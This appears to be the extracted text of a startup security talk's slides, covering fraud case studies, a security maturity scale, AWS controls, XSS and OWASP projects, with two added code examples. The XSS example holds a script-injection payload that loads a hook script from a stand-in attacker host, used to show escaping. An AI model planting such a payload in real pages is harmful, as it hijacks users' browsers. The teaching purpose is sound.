Slide 1

Slide 1 text

Rationalizing Security Matt Konda Jemurai @mkonda [email protected] https://en.wikipedia.org/wiki/Rational_function

Slide 2

Slide 2 text

Introduction

Timeline: 1997, 2006, 2014

Roles: Consultant, Engineer, Software Architect, Director of Engineering, Rabble Rouser, Founder, Consultant

Technologies: Perl, Java Applet, C++, J2EE, Spring, Ruby, Rails, Agile, Clojure, Graph Database, Big Data

Projects: Analytics, Certificate Authority, Vulnerability Scanner, Penetration Test Manager, Pricing

Domains: Retail, Banking, Manufacturing, Pharma, Healthcare, Research

Talks: Chicago BSides 2011, 2012; Defcon Skytalk; OWASP Chicago, MSP 2013; AppSec USA 2012, 2013; ChicagoRuby 2013; Secure 360; Lone Star Ruby 2013; WindyCityRails 2013; Chicago JUG 2014; RailsConf 2014; Converge 2014; ChicagoCoderConference 2015

Education: MS in CS

Current work: DevOps / Automation, Training, Coaching, Code Review, Plugged in to SDLC, Consulting, Assessments, Secure DevOps, Agile Security, Growing, OWASP Board

Trying to hack a business model that succeeds while helping developers.

@mkonda [email protected]

Slide 3

Slide 3 text

Census?

Slide 4

Slide 4 text

What are you hoping to get out of this?

Slide 5

Slide 5 text

Metasploit Demo

Slide 6

Slide 6 text

Case Study 1 e-Commerce Fraud

Slide 7

Slide 7 text

“This year, organized crime became the most frequently seen threat actor for Web App Attacks.” Verizon 2015 DBIR

Slide 8

Slide 8 text

No content

Slide 9

Slide 9 text

See
• Botnets
• Widespread use of harvested credentials
• Account takeover
• Credit card fraud
• Dumps of passwords and sensitive data with SQLi
• User pwnage with XSS

Slide 10

Slide 10 text

Case Study 2 Healthcare Fraud

Slide 11

Slide 11 text

“Two thirds of the incidents in this pattern had no attacker-attribution information whatsoever.” Verizon 2015 DBIR Cyber-Espionage

Slide 12

Slide 12 text

See
• Long term investment
• Systematic targeting
• Phishing / Social Engineering
• Pivoting

Slide 13

Slide 13 text

How long does it take for your host to get scanned / attacked on the open internet?

Slide 14

Slide 14 text

As a startup, you’re probably not an You’re in experimental mode …

Slide 15

Slide 15 text

You don’t want to worry about it

Slide 16

Slide 16 text

There are generally three things that force you to think about security.

Slide 17

Slide 17 text

No content

Slide 18

Slide 18 text

No content

Slide 19

Slide 19 text

No content

Slide 20

Slide 20 text

Your user’s privacy is important.

Slide 21

Slide 21 text

So is your company’s privacy.

Slide 22

Slide 22 text

Maturity Scale
• Opportunistic
• Defensible
• Serious
• Paranoid

Slide 23

Slide 23 text

Opportunistic
• Use platform provided security
• Run tools yourself (e.g. brakeman)

Slide 24

Slide 24 text

Defensible
• Policy, including data classification
• Security assessments
• Build servers to a security standard

Slide 25

Slide 25 text

Serious
• Active monitoring, log collection
• Incident response
• Security in SDLC (static analysis, code review, training, automation)
• Have a security team, app security team (network, desktop, server controls)
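"Active monitoring, log collection" only pays off once collected logs are turned into a signal. The block below is an added example, not code from the talk or from Jemurai: it parses sshd authentication failures out of syslog-style lines and flags source addresses that reach a failure threshold. The log lines are constructed for the example (the addresses are documentation ranges), and the threshold of 5 is an assumption to tune per environment.

```javascript
// Added example (not from the slides): turn raw sshd log lines into a
// brute-force / password-spray signal.

// Constructed sample of /var/log/auth.log style lines (not real traffic).
const SAMPLE_AUTH_LOG = `
Oct  3 12:00:01 web1 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51100 ssh2
Oct  3 12:00:02 web1 sshd[2212]: Failed password for invalid user oracle from 203.0.113.7 port 51102 ssh2
Oct  3 12:00:03 web1 sshd[2213]: Failed password for root from 203.0.113.7 port 51104 ssh2
Oct  3 12:00:04 web1 sshd[2214]: Accepted publickey for deploy from 198.51.100.20 port 40022 ssh2: RSA SHA256:abc
Oct  3 12:00:05 web1 sshd[2215]: Failed password for invalid user test from 203.0.113.7 port 51106 ssh2
Oct  3 12:00:06 web1 sshd[2216]: Failed password for deploy from 198.51.100.20 port 40024 ssh2
Oct  3 12:00:07 web1 sshd[2217]: Failed password for invalid user admin from 203.0.113.7 port 51108 ssh2
`.trim();

// Matches sshd's password-failure line; captures the user name and source IP.
// "invalid user" is present when the account does not exist on the host.
const FAILED_RE =
  /sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\d{1,3}(?:\.\d{1,3}){3}) port \d+/;

// Extract {user, ip} for every failure line; non-matching lines are ignored.
function parseFailures(logText) {
  const failures = [];
  for (const line of logText.split('\n')) {
    const m = FAILED_RE.exec(line);
    if (m) failures.push({ user: m[1], ip: m[2] });
  }
  return failures;
}

// Count failures per source address.
function countByIp(failures) {
  const counts = new Map();
  for (const f of failures) counts.set(f.ip, (counts.get(f.ip) || 0) + 1);
  return counts;
}

// Return sources with at least `threshold` failures, most active first, with
// the distinct user names each one tried. Many users from one IP looks like
// a spray; one user many times looks like a forgotten password or a
// targeted guess. The threshold value is an assumption to tune locally.
function bruteForceSources(logText, threshold = 5) {
  const failures = parseFailures(logText);
  const counts = countByIp(failures);
  const result = [];
  for (const [ip, n] of counts) {
    if (n >= threshold) {
      const users = [...new Set(failures.filter((f) => f.ip === ip).map((f) => f.user))];
      result.push({ ip, failures: n, users });
    }
  }
  return result.sort((a, b) => b.failures - a.failures);
}

// Usage: one offender crosses the threshold in the sample above.
console.log(bruteForceSources(SAMPLE_AUTH_LOG));
```

In production the same logic runs over a sliding time window rather than a whole file, and the alert should carry the user list so the responder can tell a spray from a single noisy account.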

Slide 26

Slide 26 text

Paranoid
• Threat intelligence
• Anti-Fraud
• DDoS
• Bug Bounty
• Forensics

Slide 27

Slide 27 text

Things you can do now.

Slide 28

Slide 28 text

Use Services Provided
• Use IAM to define groups and users. Use MFA.
• Limit network access. Use Trusted Advisor.
• CloudTrail
• Use encryption for S3, EBS, RDS, etc.
• New: Inspector, WAF, Config Rules

Slide 29

Slide 29 text

Cross-site Scripting
• XSS is really code injection.
• The distinction is that the code is running in your user's browser.
• This can have crippling significance, because it bypasses network and other typical controls.
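To make the "code injection" point concrete, here is an added example (not code from the talk) of the same untrusted comment rendered two ways: concatenated straight into markup, and escaped at the point of output. The payload is the shape a browser-hooking tool would inject; the host name attacker.example is made up.

```javascript
// Added example (not from the slides): XSS as code injection into HTML.

// Escape the five characters that can break out of a text node or a
// double-quoted attribute value. This is output encoding for the HTML
// context only; JavaScript, URL and CSS contexts need their own encoders.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[ch]);
}

// Vulnerable: untrusted data dropped straight into markup. Whatever the
// attacker typed into the comment form becomes code in every viewer's browser.
function renderCommentVulnerable(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Hardened: every untrusted value is escaped where it is written into HTML.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Constructed attacker input: a comment body that loads a remote script,
// which is how a hooked-browser framework gets its first foothold.
const HOOK_PAYLOAD = '<script src="https://attacker.example/hook.js"></script>';

// True if the rendered HTML still contains an executable script element,
// i.e. the payload survived rendering as code rather than as text.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

const vulnerable = renderCommentVulnerable('mallory', HOOK_PAYLOAD);
const safe = renderCommentSafe('mallory', HOOK_PAYLOAD);

console.log('vulnerable:', containsScriptTag(vulnerable), vulnerable);
console.log('safe:      ', containsScriptTag(safe), safe);
```

Once the script is running inside the user's session it carries the user's cookies and origin, so firewalls and network segmentation never see anything but ordinary browser traffic; that is why the slide calls it crippling. Escaping is necessary but context-specific, and a Content Security Policy adds a second layer if an encoder is missed.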

Slide 30

Slide 30 text

No content

Slide 31

Slide 31 text

beef demo

Slide 32

Slide 32 text

No content

Slide 33

Slide 33 text

No content

Slide 34

Slide 34 text

No content

Slide 35

Slide 35 text

No content

Slide 36

Slide 36 text

No content

Slide 37

Slide 37 text

No content

Slide 38

Slide 38 text

OWASP Top 10

Slide 39

Slide 39 text

Flagship Projects

Tools
• ZAP
• OWASP Dependency Check
• Web Testing Environment Project
• OWTF

Code
• ModSecurity
• CSRFGuard
• AppSensor

Documentation
• ASVS
• SAMM
• Top 10
• Testing Guide
• Benchmark

Slide 40

Slide 40 text

OWASP ASVS

Slide 41

Slide 41 text

Tiers
• 0 – Cursory – You have done something. You define.
• 1 – Opportunistic – Adequately defends against easily discoverable items.
• 2 – Standard – Adequately defends against items of moderate to serious risk.
• 3 – Advanced – Defends against even advanced attacks and demonstrates good security design.

Slide 42

Slide 42 text

No content

Slide 43

Slide 43 text

Discussion …

Slide 44

Slide 44 text

Technical questions? Eg. I’m using … what do I need to worry about?

Slide 45

Slide 45 text

Get a partner and talk about what data you have that people might want …

Slide 46

Slide 46 text

Villain persona

Slide 47

Slide 47 text

Future topics?